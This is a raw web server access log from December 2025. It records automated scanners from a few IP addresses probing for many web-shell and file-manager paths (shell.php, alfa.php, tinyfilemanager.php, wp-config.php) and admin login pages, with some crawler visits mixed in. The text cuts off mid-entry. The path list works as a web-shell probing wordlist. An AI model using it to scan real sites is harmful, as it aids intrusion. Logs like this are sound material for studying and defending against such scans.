[20/Dec/2025:12:40:54 -0500] "GET /wcas.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:54 -0500] "GET /wp-content/uploads/wp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:56 -0500] "GET /file5.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:58 -0500] "GET /n3.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:59 -0500] "GET /an.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:00 -0500] "GET /error.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:01 -0500] "GET /wolv2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:01 -0500] "GET /wp-is.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:04 -0500] "GET /gdn.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:05 -0500] "GET /abc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:06 -0500] "GET /doc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:07 -0500] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:08 -0500] "GET /asd67.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:10 -0500] "GET /manager.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:11 -0500] "GET /auth.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:12 -0500] "GET /hello.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:17 -0500] "GET /flower.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:18 -0500] "GET /js.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:19 -0500] "GET /wp-content/upgrade/index.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:20 -0500] "GET /update/f35.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:21 -0500] "GET /default.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:23 -0500] "GET /inde.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:25 -0500] "GET /luxe.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:28 -0500] "GET /index/function.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:29 -0500] "GET /noe.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:29 -0500] "GET /class20.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:31 -0500] "GET /te.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:32 -0500] "GET /a2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:33 -0500] "GET /cccc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:35 -0500] "GET /sid3.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:36 -0500] "GET /v4.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:37 -0500] "GET /new4.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:37 -0500] "GET /gg.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:39 -0500] "GET /gelap.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:42 -0500] "GET /wp-content/uploads/index.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:44 -0500] "GET /v.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:44 -0500] "GET /wp-good.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:45 -0500] "GET /bless.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:46 -0500] "GET /acp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:47 -0500] "GET /g.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:47 -0500] "GET /static/as.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:48 -0500] "GET /class.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:51 -0500] "GET /simple.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:52 -0500] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:53 -0500] "GET /o.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:55 -0500] "GET /f6.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:56 -0500] "GET /v2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:57 -0500] "GET /lol.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:58 -0500] "GET /fileas.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:02 -0500] "GET /ava.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:03 -0500] "GET /m.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:04 -0500] "GET /shell1.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:09 -0500] "GET /12.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:10 -0500] "GET /usep.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:12 -0500] "GET /wp-content/packed.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:13 -0500] "GET /abt.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:14 -0500] "GET /jmfi2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:15 -0500] "GET /layout.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:16 -0500] "GET /up.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:17 -0500] "GET /nope.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:20 -0500] "GET /media.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:23 -0500] "GET /wp-load.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:24 -0500] "GET /sko.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:24 -0500] "GET /new.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:26 -0500] "GET /log.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:30 -0500] "GET /r4f_1.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:30 -0500] "GET /ftp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:22 -0500] "GET /wp-content/uploads/wp-conflg.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:25 -0500] "GET /wp-mail.php/wp-includes/ID3/rnEPv9.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:26 -0500] "GET /png.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:27 -0500] "GET /zwso.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:28 -0500] "GET /about3.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:29 -0500] "GET /inputs.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:31 -0500] "GET /content.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:33 -0500] "GET /wfile.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:35 -0500] "GET /miansha.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:36 -0500] "GET /test2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:37 -0500] "GET /wp-admin/maint/index.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:38 -0500] "GET /wp-links-opml.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:40 -0500] "GET /wp-includes/IXR/about.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:42 -0500] "GET /build.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:47 -0500] "GET /ioxi-o2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:50 -0500] "GET /ol.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:54 -0500] "GET /tgrs.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:54 -0500] "GET /system_log.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:55 -0500] "GET /gifclass4.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:56 -0500] "GET /z.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:32 -0500] "GET /ext.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:33 -0500] "GET /himu.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:34 -0500] "GET /pp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:38 -0500] "GET /mah.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:39 -0500] "GET /asas.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:41 -0500] "GET /mans.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:43 -0500] "GET /atomlib.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:43 -0500] "GET /lib.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:44 -0500] "GET /lv.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:45 -0500] "GET /class-wp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:46 -0500] "GET /about.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:47 -0500] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:48 -0500] "GET /a.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:49 -0500] "GET /mail.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:50 -0500] "GET /CLA.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:51 -0500] "GET /ouh.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:52 -0500] "GET /bolt.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:53 -0500] "GET /shell.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:56 -0500] "GET /akcc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:41:57 -0500] "GET /zxz.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:44 -0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:45 -0500] "GET /dhlshipments.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:48 -0500] "GET /rasp.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:48 -0500] "GET /_inc-rasberry0342.php HTTP/1.1" 301 795 "-" "-" 216.244.66.203 - - [20/Dec/2025:12:56:45 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 203.23.179.24 - - [20/Dec/2025:12:57:34 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 40.69.66.178 - - [20/Dec/2025:12:53:45 -0500] "GET /get.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:46 -0500] "GET /index4.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:46 -0500] "GET /panelx.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:47 -0500] "GET /bekle.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:47 -0500] "GET /auths.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:48 -0500] "GET /router.php HTTP/1.1" 301 795 "-" "-" 40.69.66.178 - - [20/Dec/2025:12:53:49 -0500] "GET /wp-config.php HTTP/1.1" 301 795 "-" "-" 216.244.66.236 - - [20/Dec/2025:13:19:47 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:13:19:47 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 192.144.148.122 - - [20/Dec/2025:13:03:59 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 192.144.148.122 - - [20/Dec/2025:13:04:00 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 66.249.75.234 - - [20/Dec/2025:13:34:32 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt" 216.73.216.29 - - [20/Dec/2025:13:35:45 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.29 - - [20/Dec/2025:13:35:46 -0500] "GET /sitemap.xml HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 87.121.84.125 - - [20/Dec/2025:13:40:15 -0500] "GET /plugins/content/apismtp/apismtp.php?test=hello HTTP/1.1" 301 795 "-" "ALittle Client" 82.10.124.36 - - [20/Dec/2025:13:41:04 -0500] "GET /admin HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:41:34 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:42:26 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:40:56 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:41:26 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:41:55 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:42:04 -0500] "GET /admin.php HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 82.10.124.36 - - [20/Dec/2025:13:42:34 -0500] "GET /admin.php HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 223.244.35.77 - - [20/Dec/2025:13:59:31 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 216.244.66.236 - - [20/Dec/2025:14:04:20 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 52.167.144.215 - - [20/Dec/2025:14:09:02 -0500] "GET /viewjudgment?id=5412 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 205.210.31.40 - - [20/Dec/2025:14:17:17 -0500] "GET / HTTP/1.1" 301 795 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" 216.244.66.203 - - [20/Dec/2025:14:25:51 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.244 - - [20/Dec/2025:14:48:43 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:14:49:24 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 146.70.192.110 - - [20/Dec/2025:14:50:55 -0500] "GET /file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:50:56 -0500] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:56 -0500] "GET /manager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:50:57 -0500] "GET /manager.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:50:57 -0500] "GET /simple.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:57 -0500] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:50:57 -0500] "GET /defaults.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:58 -0500] "GET /tinyfilemanager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:50:58 -0500] "GET /gmo.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:50:58 -0500] "GET /lv.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:50:59 -0500] "GET /filemanager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:59 -0500] "GET /info.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:59 -0500] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:00 -0500] "GET /elp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:01 -0500] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:02 -0500] "GET /mah/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:02 -0500] "GET /mah.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:02 -0500] "GET /edit.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:03 -0500] "GET /.alf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.192.110 - - [20/Dec/2025:14:51:03 -0500] "GET /file2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.192.110 - - [20/Dec/2025:14:50:55 -0500] "GET /admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:56 -0500] "GET /aa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.192.110 - - [20/Dec/2025:14:50:56 -0500] "GET /about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:56 -0500] "GET /kuki.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:57 -0500] "GET /goods.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:58 -0500] "GET /b.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:59 -0500] "GET /autoload_classmap.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:50:59 -0500] "GET /r4f_1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:00 -0500] "GET /index/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:00 -0500] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:00 -0500] "GET /alfa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:00 -0500] "GET /chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:01 -0500] "GET /1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:01 -0500] "GET /mah.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:01 -0500] "GET /autoload_classmap/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.192.110 - - [20/Dec/2025:14:51:01 -0500] "GET /.well-known/about/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:02 -0500] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:02 -0500] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:03 -0500] "GET /inputs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; 